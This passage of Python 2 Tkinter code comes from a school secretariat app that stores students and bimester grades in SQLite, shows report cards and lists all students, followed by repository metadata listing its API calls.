alunos[0:len(alunos)-1]\n\t\t\tself.serie[\"text\"] = serie[0:len(serie)-1]\n\t\t\tself.turno[\"text\"] = turno[0:len(turno)-1]\n\n\n\t\t\t\n\t\tdef camposvazios():\n\n\t\t\t\tpopup = tk.Tk()\n\t\t\t\tpopup.title(\"Campos Vazios!\")\n\t\t\t\tlabel = tk.Label(popup, text=\"Por favor, selecione um aluno antes de continuar!\")\n\t\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\n\n\t\tdef editarboletim(self, parent):\n\n\n\t\t\tif self.mat.get() == 0:\n\n\t\t\t\tcamposvazios()\n\t\n\t\t\telse:\n\n\t\t\t\t\n\t\t\t\tself.label1[\"text\"] = \"Inserir Notas\"\n\t\t\t\tself.nomelabel[\"text\"] = \"Aluno:\"\n\t\t\t\tself.nomelabel[\"font\"] = LARGE_FONT\n\t\t\t\tself.aluno.destroy()\n\t\t\t\tself.botao1.destroy()\n\t\t\t\tself.botao2.destroy()\n\t\t\t\tself.matriculalabel.destroy()\n\t\t\t\tself.alunoslabel.destroy()\n\t\t\t\tself.serielabel.destroy()\n\t\t\t\tself.turnolabel.destroy()\n\t\t\t\tself.matricula.destroy()\n\t\t\t\tself.alunos.destroy()\n\t\t\t\tself.serie.destroy()\n\t\t\t\tself.turno.destroy()\n\t\n\t\t\t\tfor i in range(len(self.lista)):\n\t\t\t\t\tself.buttons[i].destroy()\n\n\t\t\t\tself.inserir.destroy()\n\t\t\t\tself.boletim.destroy()\n\t\n\n\t\n\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\tc = connection.cursor()\n\n\t\t\t\tc.execute('SELECT nome,serie,turno FROM alunos WHERE id = ?', [(self.mat.get())])\n\t\n\t\t\t\taluno = c.fetchall()\n\t\t\t\tconnection.close()\n\n\n\t\t\t\tself.aluno = tk.Label(self, fg = 'black', font = LARGE_FONT, text=aluno[0][0])\n\t\t\t\tself.aluno.place(x=120, y=110)\n\n\t\t\t\tself.serielabel = tk.Label(self, text = \"Série:\", font=LARGE_FONT)\n\t\t\t\tself.serielabel.place(x=500, y=110)\n\n\t\t\t\tself.serie = tk.Label(self, font=LARGE_FONT, text = aluno[0][1])\n\t\t\t\tself.serie.place(x=570,y=110)\n\n\t\t\t\n\t\t\t\tself.turno = tk.Label(self, font=LARGE_FONT, text=aluno[0][2])\n\t\t\t\tself.turno.place(x=600,y=110)\n\t\t\t\t\n\n\t\t\t\tself.bim = tk.IntVar()\n\t\t\t\tself.bim.set(0)\n\n\t\t\t\tself.bimestrelabel = tk.Label(self, text = \"Bimestre:\", 
font=SMALL_FONT)\n\t\t\t\tself.bimestrelabel.place(x=250, y=140)\n\t\n\n\t\t\t\tself.radio = []\n\n\t\t\t\tfor i in range(4):\n\t\t\t\t\n\t\t\t\t\tpos_x = (350+i*50)\n\t\t\t\t\t\n\t\t\t\t\tself.radio.append(tk.Radiobutton(self, value=i+1,state=\"active\", variable=self.bim, text=i+1))\n\t\t\t\t\tself.radio[i].place(x=pos_x, y=140)\n\n\t\t\t\t\n\t\t\t\tself.labels = []\n\t\t\t\tself.entradas = []\n\n\t\t\t\tAUXILIAR = [(\"Português:\",0), (\"Matemática:\",1), (\"Geografia:\",2), (\"História:\",3), (\"Biologia:\",4), (\"Física:\",5), (\"Química:\",6)]\n\n\t\t\t\tfor disciplina, indices in AUXILIAR :\n\t\t\t\t\n\t\t\t\t\tpos_y = (190+indices*20)\t\t\t\t\n\t\t\t\t\n\n\t\t\t\t\tself.labels.append(tk.Label(self, text = disciplina, font=SMALL_FONT))\n\t\t\t\t\tself.labels[indices].place(x=300, y=pos_y)\n\t\t\t\t\tself.entradas.append(tk.Entry(self, font=SMALL_FONT, width = 5))\n\t\t\t\t\tself.entradas[indices].place(x=400, y=pos_y)\n\t\t\t\n\t\t\t\n\t\t\t\tself.botaoenviar = tk.Button(self,text=\"Enviar\", font=SMALL_FONT,command = lambda: enviarnotas(self))\n\t\t\t\tself.botaoenviar.place(x=300, y=330)\n\n\t\t\t\tself.botaovoltar = tk.Button(self,text=\"Voltar\", font=SMALL_FONT,command = lambda: voltarnotas(self, parent))\n\t\t\t\tself.botaovoltar.place(x=500, y=330)\n\n\t\tdef voltarnotas(self, parent):\n\n\t\t\tself.mat.set(0)\n\t\t\tself.bim.set(0)\n\n\t\t\tfor i in range(7):\n\n\t\t\t\tself.labels[i].destroy()\n\t\t\t\tself.entradas[i].destroy()\n\n\t\t\tfor i in range(4):\n\t\t\t\t\n\t\t\t\tself.radio[i].destroy()\n\n\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.botaoenviar.destroy()\n\t\t\tself.bimestrelabel.destroy()\n\t\t\tself.aluno.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.serie.destroy()\n\t\t\tself.turno.destroy()\n\t\t\tself.label1.destroy()\n\n\t\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\t\tself.label1.place(x=20, y=50)\n\n\n\t\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botao1.place(x=250,y=150)\n\n\n\n\t\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(PaginaInicial))\n\t\t\tself.botao2.place(x=350, y=150)\n\n\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\n\n\n\t\tdef enviarnotas(self):\n\n\t\t\tnotas = []\n\n\t\t\tfor i in range(7):\n\t\t\n\t\t\t\tnotas.append(float(self.entradas[i].get()))\t\n\n\t\t\tboletim_id = int(str(self.mat.get())+str(self.bim.get()))\n\n\t\t\tnotas.append(boletim_id)\n\t\t\ti = 0\n\t\t\taux = 0\n\n\t\t\tif self.bim.get() == 0:\n\t\t\n\t\t\t\tescolhabimestre(self)\n\t\t\n\t\t\telse:\n\n\t\t\t\twhile i <= 6:\n\n\t\t\t\t\tif notas[i] < 0 or notas[i] > 10:\n\t\t\t\t\t\tnotainvalida(self)\n\t\t\t\t\t\taux += 1\n\t\t\t\t\t\tbreak\n\t\t\t\t\ti += 1\n\n\t\t\t\tif aux == 0:\n\n\t\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\t\tc = connection.cursor()\n\n\t\t\t\t\tc.execute('UPDATE boletim SET port = ?, mat = ?, geo = ?, hist = ?, bio = ?, fis = ?, qui = ? 
WHERE boletim_id = ?', notas)\n\n\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tconnection.close()\n\n\t\t\t\t\tnotasenviadas(self,parent )\n\n\n\n\n\t\tdef escolhabimestre(self):\n\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Bimestre inválido!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, escolha em qual bimestre você deseja inserir as notas!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\n\t\tdef notainvalida(self):\n\n\t\t\tpopup = tk.Tk()\n\t\t\tpopup.title(\"Nota inválida!\")\n\t\t\tlabel = tk.Label(popup, text=\"Por favor, verifique as notas antes de enviar!\")\n\t\t\tlabel.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tB1 = tk.Button(popup, text=\"Ok\", command=lambda: popup.destroy())\n\t\t\tB1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef notasenviadas(self, parent):\n\n\t\t\tself.popup = tk.Tk()\n\t\t\tself.popup.title(\"Notas enviadas com sucesso!\")\n\t\t\tself.label = tk.Label(self.popup, text=\"As notas do aluno foram enviadas com sucesso!\", width = 40)\n\t\t\tself.label.grid(row=\"1\",column=\"1\", columnspan=\"2\")\n\t\t\tself.B1 = tk.Button(self.popup, text=\"OK\", command=lambda: fechapopup(self, parent))\n\t\t\tself.B1.grid(row=\"2\",column=\"1\", sticky=\"e\")\n\n\t\tdef fechapopup(self, parent):\n\n\t\t\tself.mat.set(0)\n\t\t\tself.bim.set(0)\n\n\t\t\tfor i in range(7):\n\n\t\t\t\tself.labels[i].destroy()\n\t\t\t\tself.entradas[i].destroy()\n\n\t\t\tfor i in range(4):\n\t\t\t\t\n\t\t\t\tself.radio[i].destroy()\n\n\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.botaoenviar.destroy()\n\t\t\tself.bimestrelabel.destroy()\n\t\t\tself.aluno.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.serie.destroy()\n\t\t\tself.turno.destroy()\n\t\t\tself.label1.destroy()\n\n\t\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\t\tself.label1.place(x=20, y=50)\n\n\n\t\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\t\tself.aluno.place(x=180, y=110)\n\n\n\n\t\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botao1.place(x=250,y=150)\n\n\n\n\t\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(PaginaInicial))\n\t\t\tself.botao2.place(x=350, y=150)\n\n\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\t\t\tself.popup.destroy()\n\n\n\t\tdef visualizar(self):\n\n\n\t\t\tif self.mat.get() == 0:\n\n\t\t\t\tcamposvazios()\n\t\n\t\t\telse:\n\n\t\t\t\t\n\t\t\t\tself.label1[\"text\"] = \"Boletim\"\n\t\t\t\tself.nomelabel[\"text\"] = \"Aluno:\"\n\t\t\t\tself.nomelabel[\"font\"] = LARGE_FONT\n\t\t\t\tself.aluno.destroy()\n\t\t\t\tself.botao1.destroy()\n\t\t\t\tself.botao2.destroy()\n\t\t\t\tself.matriculalabel.destroy()\n\t\t\t\tself.alunoslabel.destroy()\n\t\t\t\tself.serielabel.destroy()\n\t\t\t\tself.turnolabel.destroy()\n\t\t\t\tself.matricula.destroy()\n\t\t\t\tself.alunos.destroy()\n\t\t\t\tself.serie.destroy()\n\t\t\t\tself.turno.destroy()\n\n\t\t\t\tfor i in range(len(self.lista)):\n\t\t\t\t\tself.buttons[i].destroy()\n\n\t\t\t\tself.inserir.destroy()\n\t\t\t\tself.boletim.destroy()\n\n\t\t\t\tself.notas = []\n\n\t\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\t\tc = 
connection.cursor()\n\n\t\t\t\tc.execute('SELECT nome,serie,turno FROM alunos WHERE id = ?', [(self.mat.get())])\n\t\n\t\t\t\taluno = c.fetchall()\n\t\t\t\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"1\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\t\t\t\t\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"2\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"3\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\n\t\t\t\tc.execute('SELECT port,mat,geo,hist, bio, fis, qui FROM boletim WHERE boletim_id = ?', [(int(str(self.mat.get())+\"4\"))])\n\n\t\t\t\tself.notas.append(c.fetchall())\n\n\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tself.aluno = tk.Label(self, fg = 'black', font = LARGE_FONT, text=aluno[0][0])\n\t\t\t\tself.aluno.place(x=120, y=110)\n\n\t\t\t\tself.serielabel = tk.Label(self, text = \"Série:\", font=LARGE_FONT)\n\t\t\t\tself.serielabel.place(x=500, y=110)\n\n\t\t\t\tself.serie = tk.Label(self, font=LARGE_FONT, text = aluno[0][1])\n\t\t\t\tself.serie.place(x=570,y=110)\n\n\t\t\t\tself.turno = tk.Label(self, font=LARGE_FONT, text=aluno[0][2])\n\t\t\t\tself.turno.place(x=600,y=110)\n\t\t\t\t\n\t\t\t\tself.labels = []\n\t\t\t\tself.bim = []\n\n\t\t\t\tDISCIPLINAS = [(\"Português:\",0), (\"Matemática:\",1), (\"Geografia:\",2), (\"História:\",3), (\"Biologia:\",4), (\"Física:\",5), (\"Química:\",6)]\n\t\t\t\tBIMESTRES = [(\"1 Bimestre\", 0), (\"2 Bimestre\", 1), (\"3 Bimestre\", 2), (\"4 Bimestre\", 3)]\n\t\t\t\t\n\n\t\t\t\tfor disciplina, indices in DISCIPLINAS:\n\t\t\t\t\n\t\t\t\t\tpos_y = (190+indices*20)\t\t\t\t\n\t\t\t\t\n\n\t\t\t\t\tself.labels.append(tk.Label(self, text = disciplina, font=SMALL_FONT))\n\t\t\t\t\tself.labels[indices].place(x=100, y=pos_y)\n\n\t\t\t\tfor bimestre, indices in BIMESTRES:\n\n\t\t\t\t\tpos_x = (200+indices*100)\n\n\t\t\t\t\tself.bim.append(tk.Label(self, text = bimestre, font=SMALL_FONT))\n\t\t\t\t\tself.bim[indices].place(x=pos_x, y=150)\n\n\t\n\t\t\t\tself.boletim = [[],[],[],[]]\n\t\t\t\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tfor j in range(7):\n\t\t\t\t\n\t\t\t\t\t\tpos_x = (240+i*100)\n\t\t\t\t\t\tpos_y = (190+j*20)\n\n\t\t\t\t\t\tself.boletim[i].append(tk.Label(self, text = self.notas[i][0][j], font=SMALL_FONT))\n\t\t\t\t\t\tself.boletim[i][j].place(x= pos_x, y= pos_y)\n\n\n\t\t\t\tself.botaovoltar = tk.Button(self, text = 'Voltar', fg = 'black',command=lambda: voltarboletim(self, parent))\n\t\t\t\tself.botaovoltar.place(x=50, y=50)\n\n\n\t\tdef voltarboletim(self, parent):\n\n\t\t\tself.mat.set(0)\n\n\t\t\tfor i in range(4):\n\t\t\t\tfor j in range(7):\n\t\t\t\t\tself.boletim[i][j].destroy()\n\t\t\n\t\t\t\n\t\t\tfor i in range(4):\n\t\t\t\tself.bim[i].destroy()\n\n\n\t\t\tfor i in range(7):\n\n\t\t\t\tself.labels[i].destroy()\n\n\n\n\t\t\tself.botaovoltar.destroy()\n\t\t\tself.aluno.destroy()\n\t\t\tself.serielabel.destroy()\n\t\t\tself.serie.destroy()\n\t\t\tself.turno.destroy()\n\t\t\tself.label1.destroy()\n\n\t\t\tself.label1 = tk.Label(self, text=\"Buscar Aluno\", font=TITLE_FONT, height = 3, width = 50)\n\t\t\tself.label1.place(x=20, y=50)\n\n\n\t\t\tself.nomelabel = tk.Label(self, text=\"Nome do aluno:\", font=SMALL_FONT)\n\t\t\tself.nomelabel.place(x=50, y=110)\n\n\n\t\t\tself.aluno = tk.Entry(self, width=40, font=SMALL_FONT)\n\t\t\tself.aluno.place(x=180, 
y=110)\n\n\n\n\t\t\tself.botao1 = tk.Button(self, text=\"Buscar\",fg = 'black', font=SMALL_FONT,command=lambda: buscar(self))\n\t\t\tself.botao1.place(x=250,y=150)\n\n\n\n\t\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: parent.show_frame(PaginaInicial))\n\t\t\tself.botao2.place(x=350, y=150)\n\n\n\n\n\t\t\tparent.show_frame(PaginaInicial)\n\n\n\nclass TodosAlunos(tk.Frame):\n\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\n\n\t\tself.label = tk.Label(self, text = 'Colégio Escolha Certa', fg = 'black', font = TITLE_FONT, height = 3, width = 50)\n\t\tself.label.place(x=20, y=0)\n\n\n\t\tself.label1 = tk.Label(self, text=\"Alunos\", font=TITLE_FONT, height = 3, width = 50)\n\t\tself.label1.place(x=20, y=50)\n\n\t\tself.botao1 = tk.Button(self, text = 'Buscar', fg = 'black', font = SMALL_FONT,command=lambda: buscar(self))\n\t\tself.botao1.place(x=200, y=350)\n\n\n\t\tself.botao2 = tk.Button(self, text = 'Voltar', fg = 'black', font = SMALL_FONT,command=lambda: voltar(self, parent))\n\t\tself.botao2.place(x=300, y=350)\n\n\t\tself.scrollbar = tk.Scrollbar(self)\n\t\tself.listbox = tk.Listbox(self, width=60, yscrollcommand=self.scrollbar.set)\n\n\t\tself.listbox.place(x=50,y=150)\n\t\t\n\t\tself.scrollbar.place(x=540, y=150, height = 160)\n\n\n\n\n\n\t\tdef buscar(self):\n\t\t\n\t\t\tconnection = sqlite3.connect('alunos.db')\n\t\t\tc = connection.cursor()\n\n\n\t\t\tc.execute('SELECT id,nome,responsavel,serie,turno FROM alunos')\n\t\n\t\t\tself.lista = c.fetchall()\n\n\t\t\tfor i in range(len(self.lista)):\n\n\t\t\t\tself.listbox.insert(\"end\", str(self.lista[i][0])+\" \"+self.lista[i][1]+\" \"+self.lista[i][2]+\" \"+str(self.lista[i][3])+\" \"+self.lista[i][4])\n\n\t\t\tself.scrollbar.config(command=self.listbox.yview)\n\n\t\t\tconnection.close()\n\n\t\t\n\t\tdef voltar(self, parent):\n\n\t\t\tfor i in range(len(self.lista)):\n\n\t\t\t\tself.listbox.delete(0, \"end\")\n\t\t\t\tparent.show_frame(PaginaInicial)\n\n\n\napp = SecretariaApp()\napp.mainloop()\n\n\n", "repo_name": "adbys/ProjetoP1", "sub_path": "sistema.py", "file_name": "sistema.py", "file_ext": "py", "file_size_in_byte": 30095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Tkinter.Tk", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Tkinter.Tk.__init__", "line_number": 31, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Tkinter.Tk.wm_title", "line_number": 32, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame", "line_number": 35, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 63, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 66, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 66, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 73, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 77, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 80, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 84, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 89, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 92, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 92, "usage_type": "attribute"}, {"api_name": 
"Tkinter.Label", "line_number": 97, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 101, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 106, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 109, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 112, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 121, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 124, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 124, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 127, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 130, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 133, "usage_type": "call"}, {"api_name": "Tkinter.IntVar", "line_number": 137, "usage_type": "call"}, {"api_name": "Tkinter.StringVar", "line_number": 139, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 145, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 148, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 156, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 165, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 168, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 172, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 175, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 203, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 206, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 210, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 213, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 216, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 219, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 223, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 226, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 229, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 252, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 272, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 275, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 278, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 287, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 296, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 299, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 303, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 306, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 317, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 321, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 321, "usage_type": "attribute"}, {"api_name": "Tkinter.IntVar", "line_number": 326, "usage_type": "call"}, {"api_name": "Tkinter.StringVar", "line_number": 328, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 331, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 334, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 337, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 340, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 343, 
"usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 346, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 350, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 352, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 355, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 358, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 361, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 363, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 366, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 368, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 370, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 374, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 378, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 381, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 411, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 463, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 465, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 467, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 472, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 474, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 476, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 481, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 483, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 485, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 487, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 493, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 496, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 496, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 499, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 503, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 507, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 511, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 516, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 521, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 538, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 544, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 548, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 551, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 554, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 557, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 560, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 563, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 567, "usage_type": "call"}, {"api_name": "Tkinter.IntVar", "line_number": 575, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 599, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 605, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 610, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 623, "usage_type": "call"}, {"api_name": "Tkinter.Label", 
"line_number": 625, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 627, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 665, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 673, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 676, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 679, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 683, "usage_type": "call"}, {"api_name": "Tkinter.IntVar", "line_number": 687, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 690, "usage_type": "call"}, {"api_name": "Tkinter.Radiobutton", "line_number": 700, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 714, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 716, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 720, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 723, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 750, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 754, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 758, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 763, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 768, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 808, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 824, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 826, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 828, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 834, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 836, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 838, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 843, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 845, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 847, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 874, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 878, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 882, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 887, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 892, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 935, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 962, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 965, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 968, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 971, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 986, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 993, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1005, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1009, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1039, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1043, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 1047, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1052, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1057, "usage_type": "call"}, 